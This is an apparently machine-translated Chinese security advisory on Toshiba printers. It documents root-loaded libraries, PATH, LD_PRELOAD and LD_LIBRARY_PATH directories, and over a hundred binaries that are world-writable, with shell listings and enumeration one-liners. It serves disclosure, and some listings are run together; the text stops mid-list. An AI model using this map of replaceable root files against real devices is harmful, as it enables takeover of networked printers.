root 1879 0.0 0.3 42492 11204 ? S 16:34 0:00 ./alLogRetriever -T8
root 1880 0.0 0.4 49340 14248 ? S 16:34 0:00 ./alExportImport -T8
root 1881 0.0 0.4 57852 14596 ? S 16:34 0:00 ./aleFilingmgr -T8
root 1882 0.0 0.4 60244 13020 ? Sl 16:34 0:00 ./alpresentationresourcemgr -T8
root 1883 0.0 0.2 35036 8340 ? S 16:34 0:00 ./alServiceUIPlugin
root 1884 0.0 0.3 45624 10220 ? Sl 16:34 0:00 ./alPanelUIMessageHandler -S ramdisk
root 1885 0.0 0.3 42016 11916 ? S 16:34 0:00 ./alusbmscapplication
root 1886 0.0 0.4 70124 12236 ? Sl 16:34 0:00 ./alViewPlugin
root 1887 0.0 0.4 83200 12652 ? Sl 16:34 0:00 ./alsharedprintDp -T8
root 1888 0.0 0.7 62028 22420 ? S 16:34 0:06 ./alnsm -d9 -m00 -T5
root 1890 0.0 0.5 128920 16292 ? Sl 16:34 0:00 ./aljobcontroller -T8
root 1891 0.0 0.4 118216 12728 ? Sl 16:34 0:00 ./alprintmn -T8
root 1892 0.0 0.3 49888 11220 ? Sl 16:34 0:00 ./alreportsmsgr
root 1893 0.0 0.5 72764 17720 ? Sl 16:34 0:00 ./alreportmanager
root 1922 0.0 0.3 46056 11236 ? S 16:34 0:00 ./almailboxapplication
root 1923 0.0 0.4 44204 13528 ? S 16:34 0:00 ./alsoftwareupdateclient -T8
root 1974 0.0 0.5 56496 15560 ? S 16:34 0:00 ./alifaxreceive -T8
root 1975 0.0 0.4 47184 14844 ? S 16:34 0:00 ./almaintenanceplugin -T6
root 1976 0.0 0.3 41416 11312 ? S 16:34 0:00 ./alpdlfiltermanager
root 1977 0.0 0.4 51736 14524 ? S 16:34 0:00 ./alCloning -T8
root 1978 0.0 0.3 43528 9412 ? Sl 16:34 0:00 ./alPanelStartLEDHandler
root 1979 0.0 0.3 39964 11504 ? S 16:34 0:00 ./alhomedatamgr
root 1980 0.0 0.6 47532 18748 ? S 16:34 0:00 ./sim -T8
root 1981 0.0 0.7 92856 23600 ? Sl 16:34 0:01 ./informationservice -T8
root 1982 0.0 0.2 34624 8476 ? S 16:34 0:00 ./sljobmanagement -T8
root 1985 0.0 0.7 59792 22588 ? Sl 16:34 0:00 ./notificationservice 1284 -T8
root 1986 0.0 0.9 87936 28716 ? Sl 16:34 0:03 ./wfpc -T8
root 1987 0.0 0.3 35524 9156 ? S 16:34 0:00 ./armn -T8
root 2205 0.0 0.4 59596 12808 ? Ss 16:35 0:00 ./wfpc -T8
root 2208 0.0 0.3 59144 11220 ? Ss 16:35 0:00 ./wfpc -T8
root 2327 0.0 0.4 55020 13452 ? S 16:35 0:00 ./alAddressBookMgr
root 2328 0.0 0.5 72396 15208 ? Sl 16:35 0:00 ./alaccountmgr
root 2426 0.0 0.3 46192 10496 ? Sl 16:35 0:00 ./agent_scan 1282 1 -T8
root 2428 0.0 0.3 44272 9844 ? Sl 16:35 0:00 ./agent_faxreceive 1282 2 -T8
root 2430 0.0 0.6 450116 19668 ? Sl 16:35 0:00 ./agent_rip 1282 6 -T8
root 2432 0.0 0.3 47100 10260 ? Sl 16:35 0:00 ./agent_print 1282 15 -T8
root 2433 0.0 0.3 44316 9816 ? Sl 16:35 0:00 ./agent_faxtransmit 1282 16 -T8
root 2434 0.0 0.3 44296 9800 ? Sl 16:35 0:00 ./agent_ipfaxtransmit 1282 31 -T8
root 2435 0.0 0.3 44268 9796 ? Sl 16:35 0:00 ./agent_ipfaxreceive 1282 32 -T8
root 2515 0.0 0.4 54636 13444 ? Sl 16:35 0:00 ./alulm
root 2516 0.0 0.3 249732 9260 ? Sl 16:35 0:00 ./alcbamanager -S ramdisk
root 2614 0.0 0.5 183976 17564 ? Sl 16:35 0:00 ./alappmanager
root 2870 0.0 0.4 54968 14848 ? Sl 16:35 0:00 ./alLogmanager
root 2871 0.0 0.4 46088 13440 ? S 16:35 0:00 ./alhddbackuprestore
[...]
root 3784 0.0 0.4 45704 12760 ? S 16:35 0:00 /home/SYSROM_SRC/build/release/bin/alftpprintd
root 3828 0.0 0.0 15516 2424 ? S 16:35 0:00 /home/SYSROM_SRC/build/release/bin/vsftpd -enableprinting
root 3860 0.1 2.3 201372 70908 ? Sl 16:35 0:25 python /home/SYSROM_SRC/build/release/bin/sapphost.py 10000000-0000-0000-0000-500000000000
root 3935 0.0 0.4 218132 13644 ? Sl 16:35 0:00 /home/SYSROM_SRC/build/release/bin/alhp9100 -f /encryption/al/network/config/hp9100.conf
root 3970 0.1 1.6 144908 48860 ? Sl 16:35 0:24 python /home/SYSROM_SRC/build/release/bin/sapphost.py 10000000-0000-0000-0000-500000000001
root 3992 0.0 0.2 33948 8128 ? S 16:35 0:00 /home/SYSROM_SRC/build/release/bin/snmp_watchdog
root 4025 0.0 0.2 34236 8920 ? S 16:35 0:00 /home/SYSROM_SRC/bin/dnsValidateDaemon
[...]打印机没有实现权限分离。
打印机中多个组件中的一个组件内部发现的漏洞足以彻底危及打印机的安全。
详细信息 – 使用 snmpd 进行本地权限提升和远程代码执行
由于 snmpd 配置中定义的库不安全,东芝打印机容易受到本地权限提升漏洞的影响。通过上传恶意库,此本地权限提升也可被利用为远程代码执行。
snmpd 配置文件位于/encryption/al/network/config/snmpd.conf包含外部和东芝特定库的加载。此库中包含的代码将以 root 身份执行(因为 snmpd 以 root 身份运行)。
内容/encryption/al/network/config/snmpd.conf:
dlmod mibs_impl /home/SYSROM_SRC/lib/libalmibs_impl.so该文件是该库的符号链接/home/SYSROM_SRC/lib/libalmibs_impl.so.0。
该/home/SYSROM_SRC/lib/libalmibs_impl.so.0文件具有不正确的权限,允许任何本地攻击者或任何远程攻击者利用预先认证的远程代码执行(以 root 或 apache 身份)和多个本地权限提升漏洞将此文件替换为恶意库。
bash-4.1# ls -la /home/SYSROM_SRC/lib/libalmibs_impl.so*
lrwxrwxrwx 1 root root 19 Mar 14 16:27 /home/SYSROM_SRC/lib/libalmibs_impl.so -> libalmibs_impl.so.0 -rwxrwxrwx 1 root root 5239499 Dec 6 03:28 /home/SYSROM_SRC/lib/libalmibs_impl.so.0
bash-4.1#
snmpd 启动时会加载此文件。snmpd 程序在打印机启动时启动,并在打印机崩溃时自动重新启动。
有可能使用预先认证的远程代码执行作为 root漏洞导致远程 snmpd 服务器崩溃,从而强制重新启动 snmpd 守护进程,加载恶意库并破坏打印机。
攻击者可以远程攻击任何东芝打印机。
详细信息 – 使用不安全的 PATH 进行本地权限提升和远程代码执行
由于 PATH 变量不安全,东芝打印机容易受到本地权限提升漏洞的影响。通过以root 或 apache 身份上传使用预认证远程代码执行的恶意程序以及多个本地权限提升漏洞,此本地权限提升也可被利用为远程代码执行。
我们发现东芝打印机配置了一个不安全的$PATH变量:
bash-4.1#echo $ PATH
/ home / SYSROM_SRC / build / release / bin:/ home / SYSROM_SRC / build / release / sbin:/ home / SYSROM_SRC / build / release / bin:
/ home / SYSROM_SRC / build / release / sbin:/ home / SYSROM_SRC / build / release / bin:/ home / SYSROM_SRC / build / release / sbin: /
bin:/ usr / bin:/ sbin:/ usr / sbin:/ sbin:/ bin:/ usr / bin:/ bin:/ usr / bin:/ bin:/ usr / bin:/ bin:/ usr / bin:/ usr / bin:/ sbin:/ usr / bin:/ usr / bin:/ usr / sbin
bash-4.1#
该$PATH变量包含几个具有不安全权限(777)的目录,允许任何攻击者植入恶意程序,然后执行这些恶意程序而不是常规程序:
-
/home/SYSROM_SRC/build/release/bin -
/home/SYSROM_SRC/build/release/sbin
这2个目录被多次指定,并配置了777权限:
/home/SYSROM_SRC/build/release/bin和的权限不安全/home/SYSROM_SRC/build/release:
bash-4.1# ls -la /home/SYSROM_SRC/bin
lrwxrwxrwx 1 root trust 17 Mar 14 16:34 /home/SYSROM_SRC/bin -> build/release/bin
bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin
total 176508 drwxrwxrwx 2 root root 36864 Mar 15 16:12 .
drwxrwxrwx 19 root root 4096 3 月 14 日 16:28 ..
lrwxrwxrwx 1 root root 25 3 月 14 日 16:27 2to3 -> ../../thirdparty/bin/2to3
lrwxrwxrwx 1 root root 29 3 月 14 日 16:27 2to3-3.5 -> ../../thirdparty/bin/2to3-3.5
-rwxrwxrwx 1 root root 120381 12 月 6 日 01:56 ALABAMA_Large.ico
-rwxrwxrwx 1 root root 25214 12 月 6 日 01:56 ALABAMA_Small.ico
-rwxrwxrwx 1 root root 143884 12 月 6 日 01:56 ALABAMA_f_Large.ico
-rwxrwxrwx 1 root root 25214 十二月 6 01:56 ALABAMA_f_Small.ico
lrwxrwxrwx 1 root root 39 三月 14 16:27 AppLicenseDataBase -> ../../thirdparty/bin/AppLicenseDataBase
...
/home/SYSROM_SRC/build/release/sbin和的权限不安全/home/SYSROM_SRC/build/release:
bash-4.1# ls -la /home/SYSROM_SRC/sbin
lrwxrwxrwx 1 root root 18 Mar 14 16:34 /home/SYSROM_SRC/sbin -> build/release/sbin
bash-4.1# ls -la /home/SYSROM_SRC/build/release/sbin
total 608 drwxrwxrwx 2 root root 4096 Dec 6 01:40 .
drwxrwxrwx 19 root root 4096 3 月 14 日 16:28 ..
-rwxrwxrwx 1 root root 4467 12 月 6 日 01:40 CheckAndRemovePerms.sh
lrwxrwxrwx 1 root root 26 3 月 14 日 16:27 afpd -> ../../thirdparty/sbin/afpd
lrwxrwxrwx 1 root root 30 3 月 14 日 16:27 arpaname -> ../../thirdparty/sbin/arpaname
lrwxrwxrwx 1 root root 28 3 月 14 日 16:27 atalkd -> ../../thirdparty/sbin/atalkd
lrwxrwxrwx 1 root root 30 3 月 14 日 16:27 cnid_dbd -> ../../thirdparty/sbin/cnid_dbd
lrwxrwxrwx 1 root root 32 3 月 14 日 16:27 cnid_metad -> ../../thirdparty/sbin/cnid_metad
lrwxrwxrwx 1 root root 34 3 月 14 日 16:27 ddns-confgen -> ../../thirdparty/sbin/ddns-confgen
...
附带说明一下,该/home/SYSROM_SRC目录非常不安全,到处都使用了不正确的权限:
bash-4.1# ls -la /home/SYSROM_SRCtotal 52drwxr-xr-x 9 root root 4096 3 月 14 日 16:34 。drwxr-xr-x 4 root root 4096 3 月 14 日 16:28 ..lrwxrwxrwx 1 root root 30 3 月 14 日 16:28 CBAHttpServer -> /registration/al/CBAHttpServerlrwxrwxrwx 1 root root 20 3 月 14 日 16:27 HDBROOT -> /home/SYSROM_SRC/tmp drwxrwxrwx 7 root root 4096 12 月 6 日 00:46 NoBuildItemslrwxrwxrwx 1 root root 28 3 月 14 日 16:28 Resources -> /registration/data/Resourceslrwxrwxrwx 1 root root 32 3 月 14 日 16:28 Resources_eBN -> /registration/data/Resources_eBN-rwxr-xr-x 1 root root 5614 3 月 14 日 16:28 Startup.shlrwxrwxrwx 1 root root 40 2016 年 4 月 6 日 TopAccess -> /home/SYSROM_SRC/build/release/TopAccesslrwxrwxrwx 1 root root 28 3 月 14 日 16:28 TopAccessPy -> /registration/al/TopAccessPylrwxrwxrwx 1 root root 23 3 月 14 日 16:28 WebAPI -> /registration/al/WebAPIlrwxrwxrwx 1 root root 25 3 月 14 日 16:28 WebPanel -> /registration/al/WebPanellrwxrwxrwx 1 root trust 17 3 月 14 日 16:34 bin -> build/release/bindrwxr-xr-x 5 root root 4096 2016 年 4 月 6 日构建drwxrwxrwx 2 root root 4096 12 月 6 日 01:13 配置drwxrwxrwx 3 root root 4096 3 月 14 日 16:28 数据lrwxrwxrwx 1 root root 17 3 月 14 日 16:34 etc -> build/release/etc-rwxr-xr-x 1 root root 1075 3 月 14 日 16:27 install_rip_ram.sh drwxrwxrwx 4 root root 4096 3 月 14 日 16:34 jobdatalrwxrwxrwx 1 root trust 17 3 月 14 日 16:34 lib -> build/release/lib drwxrwxrwx 2 root root 4096 12 月 6 日 04:48 日志lrwxrwxrwx 1 root root 18 Mar 14 16:34 sbin -> build/release/sbin -rwxrwxrwx 1 root root 3492 Dec 8 2017 setenvlrwxrwxrwx 1 root root 19 Mar 14 16:34 share -> build/release/sharedrwxr-xr-x 3 root root 4096 Dec 6 04:48 varbash-4.1#
攻击者可以将任何恶意程序放入/home/SYSROM_SRC/build/release/bin或中,它们将在存储在常规 UNIX 目录( 、、、 )/home/SYSROM_SRC/build/release/sbin中的合法程序之前执行。/bin/usr/bin/sbin/usr/sbin
攻击者可以远程攻击任何东芝打印机。
详细信息 – 使用不安全的 LD_PRELOAD 进行本地权限提升和远程代码执行
由于不安全的 LD_PRELOAD 变量,东芝打印机容易受到本地特权升级漏洞的影响。通过以root 或 apache 身份使用预先认证的远程代码执行和多个本地特权升级漏洞上传恶意库,此本地特权升级也可被利用为远程代码执行。
东芝打印机配置了一个不安全的LD_PRELOAD变量:
bash-4.1# printenv | grep LD_PRELOADLD_PRELOAD=/ramdisk/al/libGetNameInfoInterface.so:/ramdisk/al/libGetAddtInfoInterface.so:bash-4.1#
该$LD_PRELOAD变量包含 2 个具有不安全权限(777)的库,任何攻击者都可以用恶意库替换这些库,然后执行:
-
/ramdisk/al/libGetNameInfoInterface.so -
/ramdisk/al/libGetAddtInfoInterface.so
检查 LD_PRELOAD 中定义的库的权限:
bash-4.1# ls -la /ramdisk/al/libGetNameInfoInterface.so-rwxrwxrwx 1 root root 70813 Dec 6 02:02 /ramdisk/al/libGetNameInfoInterface.sobash-4.1# s -la /ramdisk/al/libGetAddtInfoInterface.so -rwxrwxrwx 1 root root 87311 Dec 6 02:02 /ramdisk/al/libGetAddtInfoInterface.sobash-4.1#
我们可以确认这两个库已加载到打印机内部的程序中。
使用/proc/$PID/maps,我们可以列出程序中加载的库:这些库加载在打印机中以 root 和 apache 身份运行的所有程序中:
bash-4.1# cd /proc && for i in */; do cat $i/cmdline && echo && grep ramdisk $i/maps;done/home/SYSROM_SRC/build/release/bin/nqnd77788000-77797000 r-xp 00000000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so77797000-77799000 rw-p 0000e000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so77799000-777a4000 r-xp 00000000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so777a4000-777a6000 rw-p 0000a000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so/home/SYSROM_SRC/build/release/bin/nqcs7776d000-7777c000 r-xp 00000000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so7777c000-7777e000 rw-p 0000e000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so7777e000-77789000 r-xp 00000000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so77789000-7778b000 rw-p 0000a000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so[...]/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start777b5000-777c4000 r-xp 00000000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so777c4000-777c6000 rw-p 0000e000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so777c7000-777d2000 r-xp 00000000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so777d2000-777d4000 rw-p 0000a000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start777b5000-777c4000 r-xp 00000000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so777c4000-777c6000 rw-p 0000e000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so777c7000-777d2000 r-xp 00000000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so777d2000-777d4000 rw-p 0000a000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so[...]./alusermgr776f6000-77705000 r-xp 00000000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so77705000-77707000 rw-p 0000e000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so77707000-77712000 r-xp 00000000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so77712000-77714000 rw-p 0000a000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so./allicensemgmt777dc000-777eb000 r-xp 00000000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so777eb000-777ed000 rw-p 0000e000 00:0d 10712 /ramdisk/al/libGetAddtInfoInterface.so777ed000-777f8000 r-xp 00000000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so777f8000-777fa000 rw-p 0000a000 00:0d 7014 /ramdisk/al/libGetNameInfoInterface.so[...]
攻击者可以远程攻击任何东芝打印机。
详细信息 – 使用不安全的 LD_LIBRARY_PATH 进行本地权限提升和远程代码执行
由于不安全的 LD_LIBRARY_PATH 变量,东芝打印机容易受到本地特权升级漏洞的影响。此本地特权升级还可被利用为远程代码执行,方法是使用预先认证的远程代码执行作为 root 或 apache 上传恶意库,并利用多个本地特权升级漏洞。
东芝打印机配置了一个不安全的$LD_LIBRARY_PATH变量:
bash-4.1# printenv|grep LD_LIBRARY_PATH
LD_LIBRARY_PATH=/home/SYSROM_SRC/build/release/lib:/mfp/lib:/home/SYSROM_SRC/NoBuildItems/common/lib:/home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/:/home/SYSROM_SRC/build/release/lib
bash-4.1#该$LD_LIBRARY_PATH变量包含 4 个目录,其权限不安全(777),任何攻击者都可以用恶意库替换这些库,然后执行这些恶意库:
-
/home/SYSROM_SRC/build/release/lib -
/mfp/lib -
/home/SYSROM_SRC/NoBuildItems/common/lib -
/home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/
我们可以确认这些目录具有不安全的权限和/或存储在这些目录中的文件具有不安全的权限,如下所示:
不安全的权限/home/SYSROM_SRC/build/release/lib:
bash-4.1# ls -la /home/SYSROM_SRC/build/release/lib
total 391144 drwxrwxrwx 4 root root 65536 5 月 27 日 16:28 。
drwxrwxrwx 19 root root 4096 5月27日 16:28 ..
lrwxrwxrwx 1 root root 38 2016年4月6日 ImageMagick-6.3.3 -> ../../thirdparty/lib/ImageMagick-6.3.3
lrwxrwxrwx 1 root root 38 3月14日 16:27 ImageMagick-6.7.5 -> ../../thirdparty/lib/ImageMagick-6.7.5
lrwxrwxrwx 1 root root 15 3月14日 16:27 al8021XNMO.so -> al8021XNMO.so.0
-rwxrwxrwx 1 root root 223011 12月6日 01:58 al8021XNMO.so.0
lrwxrwxrwx 1 root root 14 Mar 14 16:27 alDDNSNMO.so -> alDDNSNMO.so.0
-rwxrwxrwx 1 root root 171442 Dec 6 01:59 alDDNSNMO.so.0
lrwxrwxrwx 1 root root 13 Mar 14 16:27 alDNSNMO.so -> alDNSNMO.so.0
[...]
不安全的权限/mfp/lib:
bash-4.1# ls -la /mfp/lib
total 344308
drwxr-xr-x 2 root root 12288 5 月 27 日 16:28 。
drwxr-xr-x 8 root root 4096 5月27日 16:28 .. -rwxrwxrwx 1 root root 75 2013年1
月11日 DirectoryCopy.txt -rwxrwxrwx 1 root root 203 2017年6月29日 SharedFiles.ini
-rwxrwxrwx 1 root root 6210326 2022年6月9日 laser.so
-rwxrwxrwx 1 root root 11386849 2022年6月9日 laserc1x.so
-rwxrwxrwx 1 root root 298388 2017年12月17日 libAbbyyZlib.so
-rwxrwxrwx 1 root root 1518996 2017年12月17日 libBarcode.so
-rwxrwxrwx 1 root root 1045032 2017 年 12 月 17 日 libBusinessCard.Analyser.so
[...]
不安全的权限/home/SYSROM_SRC/NoBuildItems/common/lib:
bash-4.1# ls -la /home/SYSROM_SRC/NoBuildItems/common/libtotal 49580 drwxrwxrwx 2 root root 4096 5 月 27 日 16:27 。drwxrwxrwx 4 root root 4096 12 月 6 日 00:21 ..-rwxrwxrwx 1 root root 624082 12 月 6 日 04:53 libCryptolib.so-rwxrwxrwx 1 root root 624082 12 月 6 日 04:53 libCryptolib.so.0-rwxrwxrwx 1 root root 624082 2018 年 4 月 20 日 libCryptolib.so.0.0.0-rwxrwxrwx 1 root root 22366570 2018 年 6 月 4 日 libFREmbed.solrwxrwxrwx 1 root root 14 3 月 14 日 16:27 libasicif.so -> libasicif.so.1lrwxrwxrwx 1 root root 16 3月 14 16:27 libasicif.so.1 -> libasicif.so.1.0-rwxrwxrwx 1 root root 12649 2016年 4月 2日 libasicif.so.1.0[...]
不安全的权限/home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/:
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/
total 13036 drwxrwxrwx 2 510 510 4096 2019 年 9 月 13 日 .
drwxrwxrwx 18 510 510 4096 2019 年 9 月 13 日 ..
-rwxrwxrwx 1 510 510 84844 2016 年 8 月 25 日 libibusplatforminputcontextplugin.so
-rwxrwxrwx 1 510 510 13252081 2019 年 9 月 13 日 libscreenkeyboardplugin.so
bash-4.1#
顺便提一下,前面列表中的所有库也都具有不安全的权限。
攻击者可以远程攻击任何东芝打印机。
详细信息 – 使用不安全的权限对 106 个程序进行本地特权升级和远程代码执行
东芝打印机内部运行着一些特定于供应商的程序。这些程序以 root 身份运行,具有不安全的权限 (777),允许攻击者用恶意程序替换这些程序。通过使用预先认证的 root 或 apache 远程代码执行和多个本地权限提升漏洞上传恶意程序,此本地权限提升也可被利用为远程代码执行。
一些程序以 root 身份运行,例如:
bash-4.1# ps auxw | grep root
root 1448 0.0 0.7 143680 21860 ? Sl 16:34 0:00 /home/SYSROM_SRC/build/release/bin/slapd -h ldap://127.0.0.1 -f /home/SYSROM_SRC/build/release/etc/openldap/slapd.conf -d 1
root 1460 0.0 0.2 387308 8036 ? Sl 16:34 0:02 /home/SYSROM_SRC/bin/mapper firstboot=0
[...]
root 1487 0.0 0.3 53496 10184 ? Sl 16:34 0:02 ./cissm -T 7 -d ssm.xml
root 1647 0.0 0.3 67568 9256 ? Sl 16:34 0:02 ./cischeduler -S ramdisk
root 1648 0.0 0.3 49452 11852 ? Sl 16:34 0:00 ./cisystemresourcemanager -T8
root 1650 0.0 0.3 50320 11112 ? S 16:34 0:00 ./pipeMN -T8
root 1652 0.0 0.3 47372 10708 ? S 16:34 0:00 ./cpe -T8
root 1653 0.0 0.2 35524 8888 ? S 16:34 0:00 ./dem -T8
root 1654 0.0 0.4 53448 12588 ? S 16:34 0:00 ./dim -T8
root 1655 0.1 0.4 96460 12128 ? Sl 16:34 0:18 ./alboserver -T5
[...]使用这一行命令,可以列出与打印机内部运行的程序相对应的文件:
以 root 身份运行的程序:
bash-4.1# for i in $(ps auxww | grep root | awk '{ print $11 }' | grep -v '^[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v 'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e 's#^./##')");done
以不同的用户身份运行:
for i in $(ps auxww | grep -v root | awk '{ print $11 }' | grep -v '^[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v 'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e 's#^./##')");done
这些命令可以列出打印机内部发现的 106 个易受攻击的程序。
3 个易受攻击的程序未以 root 身份运行
3 个程序被确定为易受攻击(以低权限用户运行,可被任何本地或远程攻击者覆盖):
-
/home/SYSROM_SRC/thirdparty/sbin/slpd
-
/usr/local/ebx/bin/httpd
-
/usr/local/ebx/httpd_worker/bin/httpd_worker
未以 root 身份运行的易受攻击的程序:
bash-4.1# for i in $(ps auxww | grep -v root | awk '{ print $11 }' | grep -v '^[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v 'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e 's#^./##')");done
lrwxrwxrwx 1 root root 26 Mar 14 16:27 /home/SYSROM_SRC/bin/slpd -> ../../thirdparty/sbin/slpd
-rwxrwxrwx 1 apache messagebus 656546 Dec 6 01:34 /usr/local/ebx/bin/httpd
-rwxrwxrwx 1 apache messagebus 665612 Dec 6 01:34 /usr/local/ebx/httpd_worker/bin/httpd_worker
bash-4.1#
当跟踪到 slpd 的链接时,我们可以确认它也存在漏洞:
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/sbin/slpd
-rwxrwxrwx 1 root root 106023 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/sbin/slpd
bash-4.1#103 个易受攻击的程序以 root 身份运行
103 个程序已被确定为易受攻击(以 root 身份运行,可被任何本地或远程攻击者覆盖):
-
/home/SYSROM_SRC/bin/alllmnr
-
/home/SYSROM_SRC/bin/dnsValidateDaemon
-
/home/SYSROM_SRC/bin/eBXDebugLogUtility
-
/home/SYSROM_SRC/bin/ipv6_daemon
-
/home/SYSROM_SRC/bin/mapper
-
/home/SYSROM_SRC/bin/syscallerr
-
/home/SYSROM_SRC/build/release/bin/agent_faxreceive
-
/home/SYSROM_SRC/build/release/bin/agent_faxtransmit
-
/home/SYSROM_SRC/build/release/bin/agent_ipfaxreceive
-
/home/SYSROM_SRC/build/release/bin/agent_ipfaxtransmit
-
/home/SYSROM_SRC/build/release/bin/agent_print
-
/home/SYSROM_SRC/build/release/bin/agent_rip
-
/home/SYSROM_SRC/build/release/bin/agent_scan
-
/home/SYSROM_SRC/build/release/bin/alaccountmgr
-
/home/SYSROM_SRC/build/release/bin/alAddressBookMgr
-
/home/SYSROM_SRC/build/release/bin/alappmanager
-
/home/SYSROM_SRC/build/release/bin/alboserver
-
/home/SYSROM_SRC/build/release/bin/alcbamanager
-
/home/SYSROM_SRC/build/release/bin/alCloning
-
/home/SYSROM_SRC/build/release/bin/aldevauthmgmtplugin
-
/home/SYSROM_SRC/build/release/bin/aldeviceconfigplugin
-
/home/SYSROM_SRC/build/release/bin/aldeviceserviceplugin
-
/home/SYSROM_SRC/build/release/bin/aleFilingmgr
-
/home/SYSROM_SRC/build/release/bin/aleSCL
-
/home/SYSROM_SRC/build/release/bin/alExportImport
-
/home/SYSROM_SRC/build/release/bin/alfilestoragem
-
/home/SYSROM_SRC/build/release/bin/alftpprintd
-
/home/SYSROM_SRC/build/release/bin/algrpmgr
-
/home/SYSROM_SRC/build/release/bin/alhddalertmgr
-
/home/SYSROM_SRC/build/release/bin/alhddbackuprestore
-
/home/SYSROM_SRC/build/release/bin/alhomedatamgr
-
/home/SYSROM_SRC/build/release/bin/alhp9100
-
/home/SYSROM_SRC/build/release/bin/alifaxreceive
-
/home/SYSROM_SRC/build/release/bin/alintegritychkmgr
-
/home/SYSROM_SRC/build/release/bin/aljobcontroller
-
/home/SYSROM_SRC/build/release/bin/aljobtemplatemgr
-
/home/SYSROM_SRC/build/release/bin/allicensemgmt
-
/home/SYSROM_SRC/build/release/bin/allld2d
-
/home/SYSROM_SRC/build/release/bin/alLogmanager
-
/home/SYSROM_SRC/build/release/bin/alLogRetriever
-
/home/SYSROM_SRC/build/release/bin/allprng
-
/home/SYSROM_SRC/build/release/bin/almailboxapplication
-
/home/SYSROM_SRC/build/release/bin/almaintenanceplugin
-
/home/SYSROM_SRC/build/release/bin/alnetefiRemoteifsr
-
/home/SYSROM_SRC/build/release/bin/alnfcplugin
-
/home/SYSROM_SRC/build/release/bin/alnsm
-
/home/SYSROM_SRC/build/release/bin/alpanel
-
/home/SYSROM_SRC/build/release/bin/alPanelStartLEDHandler
-
/home/SYSROM_SRC/build/release/bin/alPanelUIMessageHandler
-
/home/SYSROM_SRC/build/release/bin/alpdlfiltermanager
-
/home/SYSROM_SRC/build/release/bin/alpresentationresourcemgr
-
/home/SYSROM_SRC/build/release/bin/alprintmn
-
/home/SYSROM_SRC/build/release/bin/alreportmanager
-
/home/SYSROM_SRC/build/release/bin/alreportsmsgr
-
/home/SYSROM_SRC/build/release/bin/alrestrictionmode
-
/home/SYSROM_SRC/build/release/bin/alrolemgr
-
/home/SYSROM_SRC/build/release/bin/alsecurityconfiguration
-
/home/SYSROM_SRC/build/release/bin/alServiceUIPlugin
-
/home/SYSROM_SRC/build/release/bin/alsharedprintDp
-
/home/SYSROM_SRC/build/release/bin/alsoftwareupdateclient
-
/home/SYSROM_SRC/build/release/bin/alstage2
-
/home/SYSROM_SRC/build/release/bin/alUiFrameWork
-
/home/SYSROM_SRC/build/release/bin/alulm
-
/home/SYSROM_SRC/build/release/bin/alusbmscapplication
-
/home/SYSROM_SRC/build/release/bin/alusbPrint
-
/home/SYSROM_SRC/build/release/bin/aluserAuthMgr
-
/home/SYSROM_SRC/build/release/bin/alusermgr
-
/home/SYSROM_SRC/build/release/bin/alViewPlugin
-
/home/SYSROM_SRC/build/release/bin/alwsdiscovery
-
/home/SYSROM_SRC/build/release/bin/alwsmex
-
/home/SYSROM_SRC/build/release/bin/alwsprint
-
/home/SYSROM_SRC/build/release/bin/alwsscanner
-
/home/SYSROM_SRC/build/release/bin/armn
-
/home/SYSROM_SRC/build/release/bin/cipollproc
-
/home/SYSROM_SRC/build/release/bin/ciprioritymanager
-
/home/SYSROM_SRC/build/release/bin/cischeduler
-
/home/SYSROM_SRC/build/release/bin/cissm
-
/home/SYSROM_SRC/build/release/bin/cisystemresourcemanager
-
/home/SYSROM_SRC/build/release/bin/cpe
-
/home/SYSROM_SRC/build/release/bin/de_ipfax
-
/home/SYSROM_SRC/build/release/bin/dem
-
/home/SYSROM_SRC/build/release/bin/dim
-
/home/SYSROM_SRC/build/release/bin/ebx_dl
-
/home/SYSROM_SRC/build/release/bin/faxmilter
-
/home/SYSROM_SRC/build/release/bin/informationservice
-
/home/SYSROM_SRC/build/release/bin/notificationservice
-
/home/SYSROM_SRC/build/release/bin/pipeMN
-
/home/SYSROM_SRC/build/release/bin/sim
-
/home/SYSROM_SRC/build/release/bin/sljobmanagement
-
/home/SYSROM_SRC/build/release/bin/snmp_watchdog
-
/home/SYSROM_SRC/build/release/bin/ssdktimestamp
-
/home/SYSROM_SRC/build/release/bin/wfpc
-
/home/SYSROM_SRC/build/thirdparty/bin/alipp
-
/home/SYSROM_SRC/build/thirdparty/bin/dibbler-client
-
